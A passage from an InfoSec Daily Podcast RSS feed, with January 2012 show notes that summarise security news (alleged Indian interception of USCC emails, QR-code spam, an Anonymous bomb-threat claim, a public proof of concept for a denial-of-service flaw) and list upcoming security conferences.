<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.itworldcanada.com/news/group-wants-to-know-if-india-intercepted-its-emails/144645"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.itworldcanada.com/news/group-wants-to-know-if-india-intercepted-its-emails/144645</span></a></div>
<p><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The U.S.-China Economic and Security Review Commission (USCC) has asked for an investigation after hackers posted online a memo purportedly from India&#39;s military, which claimed that the country had intercepted emails of USCC officials with the help of Nokia, Research In Motion, and Apple.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;We are aware of these reports and have contacted relevant authorities to investigate the matter,&quot; said USCC spokesman Jonathan Weston on Monday. &quot;We are unable to make further comments at this time,&quot; he added.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The memo, allegedly from the Directorate General of Military Intelligence, Foreign Division, in New Delhi, said that as India did not have access to the USCC local area network, which was a prime target in connection with arch-rival People&#39;s Republic of China, India had signed an agreement with mobile manufacturers in return for giving these companies access to the Indian market.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The memo stated that the military used &quot;backdoors&quot; provided by RIM, Nokia, Apple and unspecified others.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Indian military could not be reached for comment. A local news site however quoted a Indian military spokesman as saying that the documents were forged and were posted online with malicious intent.</span></p>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></div>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span>&nbsp;<a href="http://www.theregister.co.uk/2012/01/11/qr_codes_mobile_spam/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2012/01/11/qr_codes_mobile_spam/</span></a></div>
<p><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security researchers have spotted spam emails that point at URLs featuring embedded Quick Response codes (QR codes).</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">QR codes are a two-dimensional matrix barcode that can be scanned by a camera phone to link users directly to a website that can host any type of content, malicious or otherwise. By using QR codes (rather than links) as a jump-off point to spamvertised sites, spammers can disguise the ultimate destination of links as well as improving click-through rates. In particular, the approach helps when it comes to targeting mobile users.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Spam messages spotted by Websense look like traditional pharmaceutical spam emails, with the twist that they link to a legitimate (but abused in this case) website, 2tag.nl. The legitimate web service allows users to create QR codes for URLs but has in this case been abused to create links that ultimately point to Canadian Pharmacy penis pill sites.</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This is how the scam works. When the spammed user loads the trusted URL in the browser, a QR code appears. Scanning the QR code with a QR reader loads the pharmaceutical spam URL in the browser.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">QR codes could be the next step in mobile malware propagation because the technique offers the &quot;ultimate URL obfuscator&quot;, according to net security firm Websense, which was the first to warn of the QR code mobile spam ploy.</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Elad Sharf, a security researcher at Websense Security Labs, commented: &quot;We&rsquo;ve been looking at QR codes as a potential malware/spam route for a while now. Inherent in the design is a level of trust and novelty that can be abused. In many ways it was just a matter of time before we saw spam messages point to URLs that use embedded QR codes. This is a clear movement and evolution of traditional spammers towards targeting mobile technology.&quot;</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">More details, including screen grabs of the scam in action, are available in a post by Websense</span><a href="http://community.websense.com/blogs/securitylabs/archive/2012/01/09/spam-emails-link-to-qr-codes.aspx?cmpid=pr"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> here</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></div>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.softpedia.com/news/Anonymous-Accused-of-Sending-Bomb-Threats-to-Finnish-Anti-Piracy-Firm-245872.shtml"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.softpedia.com/news/Anonymous-Accused-of-Sending-Bomb-Threats-to-Finnish-Anti-Piracy-Firm-245872.shtml</span></a></div>
<p><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Finland&rsquo;s Copyright, Information and Anti-Piracy Centre (CIAPC), the organization whose website was taken down the other day by Anonymous Finland for ordering one of the country&rsquo;s largest ISPs Elisa to block its account holders from accessing The Pirate Bay (TPB), claims they received a bomb threat from Anonymous hacktivists.</span></p>
<p>	<a href="http://yle.fi/uutiset/news/2012/01/police_investigate_anti-piracy_group_bomb_threat_3165279.html"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">YLE</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> reports that CIAPC received an email from Anonymous in which the hackers threatened to place a bomb in their offices this week.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">After asking the police to investigate the distributed denial of service (DDoS) attack that forced them to take down their website, now the authorities were called to look into this, much more serious, bomb threat.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Upon hearing the news, Anonymous Finland immediately responded to deny they have any implications, stating that they don&rsquo;t condone with the use of physical violence.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Anonymous doesn&#39;t condone the use of physical violence,&rdquo; the hackers</span><a href="https://twitter.com/#%21/anon_finland"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> state</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;We deny to have sent a bomb email threat to CIAPC. We demand YLE to report this statement today &amp; asap: don&#39;t [expletive] us off.&rdquo;</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Of course, if they didn&rsquo;t send the bomb threat, it doesn&rsquo;t mean that their protest against Finland&rsquo;s anti-piracy outfits ends here.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Online activists say that if IFPI obtains an order that forces TeliaSonera and DNA to block TPB the way Elisa does they&rsquo;ll &ldquo;tear it down.&rdquo;</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;IFPI, We ain&#39;t kiddin. We&#39;ve the means &amp; all the time of the world to wipe You out. U&#39;ll bankrupt to fix the mess We&#39;ll cause You,&rdquo; the hacker wrote in a tweet a few hours ago. </span></p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.computerworld.com/s/article/9223359/Public_attack_code_aimed_at_Windows_Web_servers_works_says_Symantec"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.computerworld.com/s/article/9223359/Public_attack_code_aimed_at_Windows_Web_servers_works_says_Symantec</span></a></div>
<p><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The proof-of-concept exploit was published last Friday on GitHub, a site that hosts software projects, and has been used in the past by hackers to distribute their work.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Other security experts were not surprised that attack code appeared within days of Microsoft rushing out a patch for a denial-of-service vulnerability in its software.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;No, not surprising at all,&quot; Andrew Storms, director of security operations at nCircle Security, said in an interview Tuesday. &quot;There was enough interest [in the researchers&#39; original presentation] that we should have expected exploit code soon.&quot;</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The presentation Storms referred to was made by German researchers Alexander Klink and Julian Walde on Dec. 28 at the Chaos Communication Congress (CCC) conference in Berlin, where they demonstrated a flaw in the Web&#39;s most popular application and site programming languages, including Microsoft&#39;s ASP .Net, the open-source PHP and Ruby, Oracle&#39;s Java and Google&#39;s V8 JavaScript.</span></p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></div>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-565-pentesting-lessons-casey-anthony-uscc-qr-codes-anonbomb-public-code/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3357/0/infosec-daily-podcast-episode-565.mp3" length="17203344" type="audio/mpeg" />
		<itunes:duration>0:35:47</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 565 for January 11, 2012.&#160; Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Keith Pachulski, and Varun Sharma.
	&#160;
Announcements:
Information Security Blogger Awards 2012
	Sinc[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 565 for January 11, 2012.&#160; Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Keith Pachulski, and Varun Sharma.
	&#160;
Announcements:
Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	New England InfoSec Tweetup
	When: January 21, 2012
	Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH
	http://neistu3.eventbrite.com/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Schmoocon Epilogue
	When: After Schmoocon
	Where: Washington, DC
	Hit up anyone in NOVA Hackers
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9 
	Where: Seattle, Washington
	http://www.social-engineer.com/social-engineer-training
	BSides Chicago
	When: Saturday, April 28th, 2012
	Where: Volcano Room (further info coming)
	Cost: Free (as always!) &#8211; Registration opening soon!
	http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012
	They&#8217;re looking for sponsors, so if you know someone, pass it on.
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go tohttp://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	Pentest Lessons:
	Adam Compton &#38; Zac Wagle&#39;s should get credit for the &#34;Pentest Lessons&#34; idea. They also started a twitter account:https://twitter.com/pentestlessons.
	Lesson 1: Keep your employees SO busy that they don&#8217;t have time to get pwnd.
	Lesson 2: Make sure you&#39;re going to get paid, before you submit your invoice.
	Lesson 3: Don&#8217;t sign shit!
	Lesson 4: Pre-meeting doxing, and social engineer to be what your client needs you to be&#8221;
	Lesson 5: Following don&#8217;t sign shit, remember who is paying the bill. But that does not mean you need to be a complete passive[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 564 &#8211; Retaliation!, It’s Official, Forgotten Passwords, RINOA, Detecting Plagiarism &amp; OWASP Mantra</title>
		<link>http://www.isdpodcast.com/episode-564-retaliation-its-official-forgotten-passwords-rinoa-detecting-plagiarism-owasp-mantra</link>
		<comments>http://www.isdpodcast.com/episode-564-retaliation-its-official-forgotten-passwords-rinoa-detecting-plagiarism-owasp-mantra#comments</comments>
		<pubDate>Wed, 11 Jan 2012 02:07:42 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3352</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 564 for January 10, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Themson Mester. &#160; Announcements: Information Security Blogger Awards 2012 Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 564 for January 10, 2012. &nbsp;</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Themson Mester.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.ashimmy.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">On &nbsp;a somewhat related note, Mubix launched a poll to see which podcasts everyone is listening to. &nbsp;Go to</span><a href="http://twtpoll.com/jlknm0"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://twtpoll.com/jlknm0</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> to take the poll.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New England InfoSec Tweetup</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH</span><br />
	<a href="http://neistu3.eventbrite.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://neistu3.eventbrite.com/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Schmoocon Epilogue</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: After Schmoocon</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington, DC</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hit up anyone in NOVA Hackers</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD</span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
